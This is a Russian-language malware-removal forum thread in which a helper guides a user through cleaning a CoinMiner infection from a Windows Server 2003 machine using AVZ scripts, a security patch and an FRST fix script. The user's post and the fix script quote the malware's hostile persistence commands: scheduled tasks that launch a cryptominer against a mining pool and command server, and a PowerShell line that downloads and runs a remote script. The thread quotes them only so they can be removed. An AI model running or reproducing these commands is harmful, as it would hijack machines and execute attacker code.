Win32/CoinMiner.DQ

**VladZ** · 26.01.2018, 13:29

Доброго времени.Подцепили вот такую штуку, NOD32 распознает как Win32/CoinMiner.DQ. Без сети он бездействует. регулярно "ложит" сервер в синий экран, после чего появляются в автозагрузке служб разделы в которых создаются задачи на открытие фалов таких как
C:\Windows\Fonts sqlservr.exe, C:\Windows\Fonts sqlwriter.exe, в реестре появляются задачи :
cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Task" /TR "C:\Windows\System32\config\systemprofile\AppData\ Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" &&cmd /c SCHTASKS /RUN /TN "Windows Update Task" && cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Tasks" /TR "C:\Windows\SysWOW64\config\systemprofile\AppData\ Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" && cmd /c SCHTASKS /RUN /TN "Windows Update Tasks"
НЕ дает установить антивирусы, ошибка "Точка входа в процедуру DecodePointer не найдена в библиотеке DLL Kernel32dll". RIST.exe из AUTOLOGERa тоже не пустило с данной ошибкой. Диспетчер задач заблокирован. убиваем процесс через processkiller. чистим руками новые службы в автозагрузке, удаляем в реестре. по путям в реестре удаляем руками файлы, но это до следующего BSOD. и всё заново. Повторюсь,-без сети все ок.Из антивирусов работают только нод32 и AVZ.
P.S. Windows server 2003 enterprize sp1

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 26.01.2018, 13:30

Уважаемый(ая) VladZ, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 28.01.2018, 12:53

Выполните скрипт в AVZ:

Код:

begin
SearchRootkit(true, true);
 TerminateProcessByName('c:\windows\fonts\sqlservr.exe');
 QuarantineFile('c:\windows\fonts\sqlservr.exe', '');
 QuarantineFile('C:\windows\fonts\sqlwriter.exe', '');
 QuarantineFile('C:\WINDOWS\TEMP\rowUVtFq.exe', '');
 DeleteFile('c:\windows\fonts\sqlservr.exe', '32');
 DeleteFile('C:\windows\fonts\sqlwriter.exe', '32');
 DeleteFile('C:\WINDOWS\TEMP\rowUVtFq.exe', '32');
 DeleteService('TTTQ');
 DeleteService('VvWE');
 RegKeyParamDel('HKEY_USERS', '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run', 'rowUVtFq');
 RegKeyParamDel('HKEY_USERS', 'S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run', 'rowUVtFq');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
end.

Пожалуйста, перезагрузите компьютер вручную.

Выполните в AVZ скрипт:

Код:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Сделайте новый лог такой версией Autologger, Ok после запуска нажимайте с зажатой клавишей Shift.

**VladZ** · 29.01.2018, 08:01

карантин выгружен

- - - - -Добавлено - - - - -

RSIT не запустился Аналогичная ошибка

**Vvvyg** · 29.01.2018, 20:05

Обновление отсюда http://www.catalog.update.microsoft....px?q=KB4012598 для своей системы установите, а то бестолку чистить майнер.

Выполните в AVZ скрипт:

Код:

begin
SearchRootkit(true, true);
 QuarantineFile('C:\WINDOWS\Fonts\sqlservr.exe', '');
 QuarantineFile('C:\windows\fonts\sqlwriter.exe', '');
 QuarantineFile('C:\WINDOWS\Fonts\winlogon.exe', '');
 DeleteFile('C:\WINDOWS\Fonts\sqlservr.exe', '32');
 DeleteFile('C:\windows\fonts\sqlwriter.exe', '32');
 DeleteFile('C:\WINDOWS\Fonts\winlogon.exe', '32');
 DeleteService('rAqA');
 RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\Themes\Parameters', 'ServiceDll');
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 2, true);
BC_Activate;
end.

Перезагрузите сервер.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**VladZ** · 02.02.2018, 08:40

После установки заплат предлагаемые вами программы запустились. Остались проблемы IPsec не запускается-не найден файл.Отключил в службах. Во вложении FRST и Autologger отчеты. Сервер перестал выпадать в синий экран.
.AVZ карантин не создал. В реестре остались следы.

**Vvvyg** · 02.02.2018, 22:25

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
S2 crqiyahw; C:\WINDOWS\system32\vdnas.dll [X]
S2 eGoL; C:\windows\fonts\sqlwriter.exe [X]
S2 fZuU; C:\windows\fonts\sqlwriter.exe [X]
S2 IPmk; 'cmd /c powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/da-vinki/test2/master/basic.ps1')) [X]
S2 ixfH; cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Task" /TR "C:\Windows\System32\config\systemprofile\AppData\Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" &&cmd /c SCHTASKS /RUN /TN "Windows Update Task" && cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Tasks" /TR "C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" && cmd /c SCHTASKS /RUN /TN "Windows Update Tasks" <==== ATTENTION
S2 JYYl; C:\windows\fonts\sqlwriter.exe [X]
S2 KtXC; %COMSPEC% /b /c start /b /min C:\ProgramData\DWPR.exe"  [X]
S2 PmyY; cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Task" /TR "C:\Windows\System32\config\systemprofile\AppData\Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" &&cmd /c SCHTASKS /RUN /TN "Windows Update Task" && cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Tasks" /TR "C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" && cmd /c SCHTASKS /RUN /TN "Windows Update Tasks" <==== ATTENTION
S4 PnPService; F:\HCT\PnPService.exe [X]
S2 pQBk; C:\windows\fonts\sqlwriter.exe [X]
S2 QXfG; C:\windows\fonts\sqlwriter.exe [X]
S2 RRWY; C:\windows\fonts\sqlwriter.exe [X]
S2 SyjF; C:\windows\fonts\sqlwriter.exe [X]
S4 Themes; C:\Documents and Settings\All Users\Application Data\Storm\update\%YOUSHIZHUAY%\iewqo.cc3 [X]
S2 TRwE; cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Task" /TR "C:\Windows\System32\config\systemprofile\AppData\Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" &&cmd /c SCHTASKS /RUN /TN "Windows Update Task" && cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Tasks" /TR "C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" && cmd /c SCHTASKS /RUN /TN "Windows Update Tasks" <==== ATTENTION
S4 Uglbfy uadgqa; C:\Program Files\Common Files\spoolvs.exe [X]
S2 vwma; cmd /c mkdir C:\Windows\System32\config\systemprofile\AppData\Local\Matrox\net [X]
S2 YupT; cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Task" /TR "C:\Windows\System32\config\systemprofile\AppData\Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" &&cmd /c SCHTASKS /RUN /TN "Windows Update Task" && cmd /c SCHTASKS /CREATE /F /RU SYSTEM /SC DAILY /DU 24:00 /RI 1 /TN "Windows Update Tasks" /TR "C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Matrox\net\dllhost.exe --max-cpu-usage=85 -a cryptonight-lite -o stratum+tcp://pool.r007.nl:443 -u x -p x --cc-url=cc.r007.nl --cc-access-token=ABCDEFabc123 --donate-level 1" && cmd /c SCHTASKS /RUN /TN "Windows Update Tasks" <==== ATTENTION
S2 ZHPb; cmd /c c:\\Windows\\microsoft.exe [X]
S2 zxHy; %COMSPEC% /b /c start /b /min C:\ProgramData\DWPR.exe"  [X]
NETSVC: ibcer -> no filepath.
NETSVC: evgjb -> no filepath.
NETSVC: znfrmwxsm -> no filepath.
NETSVC: pisotw -> no filepath.
NETSVC: zwenjad -> no filepath.
NETSVC: crqiyahw -> C:\WINDOWS\system32\vdnas.dll ==> No File
2018-02-01 14:39 - 2018-02-01 14:39 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-19.dmp
2018-02-01 14:07 - 2018-02-01 14:07 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-18.dmp
2018-02-01 14:02 - 2018-02-01 14:02 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-17.dmp
2018-02-01 12:05 - 2018-02-01 12:05 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-16.dmp
2018-02-01 11:35 - 2018-02-01 11:35 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-15.dmp
2018-02-01 11:31 - 2018-02-01 11:31 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-14.dmp
2018-02-01 10:03 - 2018-02-01 10:03 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-13.dmp
2018-02-01 07:40 - 2018-02-01 07:40 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-12.dmp
2018-02-01 07:29 - 2018-02-01 07:29 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-11.dmp
2018-02-01 07:22 - 2018-02-01 07:22 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-10.dmp
2018-02-01 07:15 - 2018-02-01 07:15 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-09.dmp
2018-02-01 07:07 - 2018-02-01 07:07 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-08.dmp
2018-02-01 06:21 - 2018-02-01 06:21 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-07.dmp
2018-02-01 06:14 - 2018-02-01 06:14 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-06.dmp
2018-02-01 06:02 - 2018-02-01 06:02 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-05.dmp
2018-02-01 05:57 - 2018-02-01 05:57 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-04.dmp
2018-02-01 05:28 - 2018-02-01 05:28 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-03.dmp
2018-02-01 04:06 - 2018-02-01 04:06 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-02.dmp
2018-02-01 03:59 - 2018-02-01 03:59 - 000065536 _____ C:\WINDOWS\Minidump\Mini020118-01.dmp
2018-01-31 20:48 - 2018-01-31 20:48 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-20.dmp
2018-01-31 17:33 - 2018-01-31 17:33 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-19.dmp
2018-01-31 17:22 - 2018-01-31 17:22 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-18.dmp
2018-01-31 17:06 - 2018-01-31 17:06 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-17.dmp
2018-01-31 16:07 - 2018-01-31 16:07 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-16.dmp
2018-01-31 15:54 - 2018-01-31 15:54 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-15.dmp
2018-01-31 15:10 - 2018-01-31 15:10 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-14.dmp
2018-01-31 14:45 - 2018-01-31 14:45 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-13.dmp
2018-01-31 14:38 - 2018-01-31 14:38 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-12.dmp
2018-01-31 13:30 - 2018-01-31 13:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-11.dmp
2018-01-31 13:19 - 2018-01-31 13:19 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-10.dmp
2018-01-31 11:22 - 2018-01-31 11:22 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-09.dmp
2018-01-31 10:34 - 2018-01-31 10:34 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-08.dmp
2018-01-31 08:13 - 2018-01-31 08:13 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-07.dmp
2018-01-31 08:02 - 2018-01-31 08:02 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-06.dmp
2018-01-31 07:54 - 2018-01-31 07:54 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-05.dmp
2018-01-31 07:31 - 2018-01-31 07:31 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-04.dmp
2018-01-31 07:26 - 2018-01-31 07:26 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-03.dmp
2018-01-31 01:19 - 2018-01-31 01:19 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-02.dmp
2018-01-31 00:35 - 2018-01-31 00:35 - 000065536 _____ C:\WINDOWS\Minidump\Mini013118-01.dmp
2018-01-30 22:51 - 2018-01-30 22:51 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-13.dmp
2018-01-30 19:39 - 2018-01-30 19:39 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-12.dmp
2018-01-30 18:20 - 2018-01-30 18:20 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-11.dmp
2018-01-30 14:28 - 2018-01-30 14:28 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-10.dmp
2018-01-30 14:07 - 2018-01-30 14:07 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-09.dmp
2018-01-30 13:37 - 2018-01-30 13:37 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-08.dmp
2018-01-30 13:29 - 2018-01-30 13:29 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-07.dmp
2018-01-30 12:46 - 2018-01-30 12:46 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-06.dmp
2018-01-30 03:29 - 2018-01-30 03:29 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-05.dmp
2018-01-30 03:23 - 2018-01-30 03:23 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-04.dmp
2018-01-30 03:17 - 2018-01-30 03:17 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-03.dmp
2018-01-30 02:53 - 2018-01-30 02:53 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-02.dmp
2018-01-30 02:38 - 2018-01-30 02:38 - 000065536 _____ C:\WINDOWS\Minidump\Mini013018-01.dmp
2018-01-29 17:13 - 2018-01-29 17:13 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-10.dmp
2018-01-29 15:58 - 2018-01-29 15:58 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-09.dmp
2018-01-29 10:11 - 2018-01-29 10:11 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-08.dmp
2018-01-29 09:55 - 2018-02-01 15:35 - 000007168 _____ C:\WINDOWS\system32\Drivers\utqwndey.sys
2018-01-29 08:05 - 2018-01-29 08:05 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-07.dmp
2018-01-29 07:46 - 2018-01-29 07:46 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-06.dmp
2018-01-29 07:30 - 2018-01-29 07:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-05.dmp
2018-01-29 06:16 - 2018-01-29 06:16 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-04.dmp
2018-01-29 06:06 - 2018-01-29 06:06 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-03.dmp
2018-01-29 05:47 - 2018-01-29 05:47 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-02.dmp
2018-01-29 04:47 - 2018-01-29 04:47 - 000065536 _____ C:\WINDOWS\Minidump\Mini012918-01.dmp
2018-01-28 23:42 - 2018-01-28 23:42 - 000065536 _____ C:\WINDOWS\Minidump\Mini012818-05.dmp
2018-01-28 12:30 - 2018-01-28 12:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini012818-04.dmp
2018-01-28 11:10 - 2018-01-28 11:10 - 000065536 _____ C:\WINDOWS\Minidump\Mini012818-03.dmp
2018-01-28 03:57 - 2018-01-28 03:57 - 000065536 _____ C:\WINDOWS\Minidump\Mini012818-02.dmp
2018-01-28 00:59 - 2018-01-28 00:59 - 000065536 _____ C:\WINDOWS\Minidump\Mini012818-01.dmp
2018-01-27 21:58 - 2018-01-27 21:58 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-09.dmp
2018-01-27 21:44 - 2018-01-27 21:44 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-08.dmp
2018-01-27 20:41 - 2018-01-27 20:41 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-07.dmp
2018-01-27 18:12 - 2018-01-27 18:12 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-06.dmp
2018-01-27 13:13 - 2018-01-27 13:13 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-05.dmp
2018-01-27 11:15 - 2018-01-27 11:15 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-04.dmp
2018-01-27 08:59 - 2018-01-27 08:59 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-03.dmp
2018-01-27 01:59 - 2018-01-27 01:59 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-02.dmp
2018-01-27 01:55 - 2018-01-27 01:55 - 000065536 _____ C:\WINDOWS\Minidump\Mini012718-01.dmp
2018-01-26 21:18 - 2018-01-26 21:18 - 000065536 _____ C:\WINDOWS\Minidump\Mini012618-06.dmp
2018-01-26 20:47 - 2018-01-26 20:47 - 000065536 _____ C:\WINDOWS\Minidump\Mini012618-05.dmp
2018-01-26 14:12 - 2018-01-26 14:12 - 000065536 _____ C:\WINDOWS\Minidump\Mini012618-04.dmp
2018-01-26 10:56 - 2018-01-26 10:56 - 000065536 _____ C:\WINDOWS\Minidump\Mini012618-03.dmp
2018-01-26 10:16 - 2018-01-26 10:16 - 000065536 _____ C:\WINDOWS\Minidump\Mini012618-02.dmp
2018-01-26 09:39 - 2018-01-26 09:39 - 000065536 _____ C:\WINDOWS\Minidump\Mini012618-01.dmp
2018-01-25 14:31 - 2018-01-25 14:31 - 000065536 _____ C:\WINDOWS\Minidump\Mini012518-06.dmp
2018-01-25 12:44 - 2018-01-25 12:44 - 000065536 _____ C:\WINDOWS\Minidump\Mini012518-05.dmp
2018-01-25 12:11 - 2018-01-25 12:11 - 000065536 _____ C:\WINDOWS\Minidump\Mini012518-04.dmp
2018-01-25 11:12 - 2018-01-25 11:12 - 000065536 _____ C:\WINDOWS\Minidump\Mini012518-03.dmp
2018-01-25 08:53 - 2018-01-25 08:53 - 000065536 _____ C:\WINDOWS\Minidump\Mini012518-02.dmp
2018-01-25 03:01 - 2018-01-25 03:01 - 000065536 _____ C:\WINDOWS\Minidump\Mini012518-01.dmp
2018-01-24 22:33 - 2018-01-24 22:33 - 000065536 _____ C:\WINDOWS\Minidump\Mini012418-07.dmp
2018-01-24 22:24 - 2018-01-24 22:24 - 000065536 _____ C:\WINDOWS\Minidump\Mini012418-06.dmp
2018-01-24 21:40 - 2018-01-24 21:40 - 000065536 _____ C:\WINDOWS\Minidump\Mini012418-05.dmp
2018-01-24 20:35 - 2018-01-24 20:35 - 000065536 _____ C:\WINDOWS\Minidump\Mini012418-04.dmp
2018-01-24 18:36 - 2018-01-24 18:36 - 000065536 _____ C:\WINDOWS\Minidump\Mini012418-03.dmp
2018-01-24 11:33 - 2018-01-24 11:33 - 000065536 _____ C:\WINDOWS\Minidump\Mini012418-02.dmp
2018-01-24 08:51 - 2018-01-24 08:51 - 000065536 _____ C:\WINDOWS\Minidump\Mini012418-01.dmp
2018-01-23 23:37 - 2018-01-23 23:37 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-11.dmp
2018-01-23 23:19 - 2018-01-23 23:19 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-10.dmp
2018-01-23 18:04 - 2018-01-23 18:04 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-09.dmp
2018-01-23 17:43 - 2018-01-23 17:43 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-08.dmp
2018-01-23 14:55 - 2018-01-23 14:55 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-07.dmp
2018-01-23 14:20 - 2018-01-23 14:20 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-06.dmp
2018-01-23 12:02 - 2018-01-23 12:02 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-05.dmp
2018-01-23 09:59 - 2018-01-23 09:59 - 000092920 _____ C:\WINDOWS\ntbtlog.txt
2018-01-23 03:48 - 2018-01-23 03:48 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-04.dmp
2018-01-23 01:06 - 2018-01-23 01:06 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-03.dmp
2018-01-23 00:56 - 2018-01-23 00:56 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-02.dmp
2018-01-23 00:42 - 2018-01-23 00:42 - 000065536 _____ C:\WINDOWS\Minidump\Mini012318-01.dmp
2018-01-22 23:42 - 2018-01-22 23:42 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-10.dmp
2018-01-22 20:52 - 2018-01-22 20:52 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-09.dmp
2018-01-22 19:17 - 2018-01-22 19:17 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-08.dmp
2018-01-22 19:09 - 2018-01-22 19:09 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-07.dmp
2018-01-22 18:07 - 2018-01-22 18:07 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-06.dmp
2018-01-22 14:39 - 2018-01-22 14:39 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-05.dmp
2018-01-22 14:32 - 2018-01-22 14:32 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-04.dmp
2018-01-22 09:01 - 2018-01-22 09:01 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-03.dmp
2018-01-22 04:32 - 2018-01-22 04:32 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-02.dmp
2018-01-22 01:24 - 2018-01-22 01:24 - 000065536 _____ C:\WINDOWS\Minidump\Mini012218-01.dmp
2018-01-21 20:22 - 2018-01-21 20:22 - 000065536 _____ C:\WINDOWS\Minidump\Mini012118-07.dmp
2018-01-21 20:13 - 2018-01-21 20:13 - 000065536 _____ C:\WINDOWS\Minidump\Mini012118-06.dmp
2018-01-21 20:04 - 2018-01-21 20:04 - 000065536 _____ C:\WINDOWS\Minidump\Mini012118-05.dmp
2018-01-21 15:23 - 2018-01-21 15:23 - 000065536 _____ C:\WINDOWS\Minidump\Mini012118-04.dmp
2018-01-21 15:15 - 2018-01-21 15:15 - 000065536 _____ C:\WINDOWS\Minidump\Mini012118-03.dmp
2018-01-21 05:52 - 2018-01-21 05:52 - 000065536 _____ C:\WINDOWS\Minidump\Mini012118-02.dmp
2018-01-21 02:30 - 2018-01-21 02:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini012118-01.dmp
2018-01-20 22:46 - 2018-01-20 22:46 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-23.dmp
2018-01-20 22:41 - 2018-01-20 22:41 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-22.dmp
2018-01-20 20:38 - 2018-01-20 20:38 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-21.dmp
2018-01-20 20:32 - 2018-01-20 20:32 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-20.dmp
2018-01-20 20:00 - 2018-01-20 20:00 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-19.dmp
2018-01-20 19:52 - 2018-01-20 19:52 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-18.dmp
2018-01-20 19:40 - 2018-01-20 19:40 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-17.dmp
2018-01-20 18:58 - 2018-01-20 18:58 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-16.dmp
2018-01-20 17:13 - 2018-01-20 17:13 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-15.dmp
2018-01-20 13:56 - 2018-01-20 13:56 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-14.dmp
2018-01-20 13:28 - 2018-01-20 13:28 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-13.dmp
2018-01-20 13:22 - 2018-01-20 13:22 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-12.dmp
2018-01-20 12:09 - 2018-01-20 12:09 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-11.dmp
2018-01-20 12:00 - 2018-01-20 12:00 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-10.dmp
2018-01-20 11:51 - 2018-01-20 11:51 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-09.dmp
2018-01-20 11:37 - 2018-01-20 11:37 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-08.dmp
2018-01-20 10:12 - 2018-01-20 10:12 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-07.dmp
2018-01-20 06:56 - 2018-01-20 06:56 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-06.dmp
2018-01-20 06:48 - 2018-01-20 06:48 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-05.dmp
2018-01-20 06:38 - 2018-01-20 06:38 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-04.dmp
2018-01-20 06:22 - 2018-01-20 06:22 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-03.dmp
2018-01-20 05:31 - 2018-01-20 05:31 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-02.dmp
2018-01-20 02:34 - 2018-01-20 02:34 - 000065536 _____ C:\WINDOWS\Minidump\Mini012018-01.dmp
2018-01-19 20:41 - 2018-01-19 20:41 - 000065536 _____ C:\WINDOWS\Minidump\Mini011918-06.dmp
2018-01-19 14:30 - 2018-01-19 14:30 - 000065536 _____ C:\WINDOWS\Minidump\Mini011918-05.dmp
2018-01-19 14:17 - 2018-01-19 14:17 - 000065536 _____ C:\WINDOWS\Minidump\Mini011918-04.dmp
2018-01-19 12:34 - 2018-01-19 12:34 - 000065536 _____ C:\WINDOWS\Minidump\Mini011918-03.dmp
2018-01-19 12:24 - 2018-01-19 12:24 - 000065536 _____ C:\WINDOWS\Minidump\Mini011918-02.dmp
2018-01-19 03:14 - 2018-01-19 03:14 - 000065536 _____ C:\WINDOWS\Minidump\Mini011918-01.dmp
2018-01-18 21:16 - 2018-01-18 21:16 - 000065536 _____ C:\WINDOWS\Minidump\Mini011818-12.dmp
